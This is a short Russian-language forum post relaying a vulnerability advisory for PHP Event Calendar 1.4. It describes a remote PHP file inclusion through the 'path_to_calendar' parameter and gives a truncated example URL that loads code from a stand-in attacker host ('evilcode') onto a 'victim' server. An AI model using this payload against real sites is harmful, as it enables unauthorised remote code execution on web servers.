• XSS.stack #1 – первый литературный журнал от юзеров форума

Web PHP-инклюдинг в PHP Event Calendar 1.4

DeeIP

HDD-drive
Пользователь
Регистрация
22.04.2006
Сообщения
35
Реакции
0
Программа: PHP Event Calendar 1.4, возможно другие версии.

Опасность: Критическая

Наличие эксплоита: Да

Описание:

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "path_to_calendar" в сценарии cl_files/calendar.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:

http://victim/path_to_cl_files/calendar.ph...http://evilcode
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх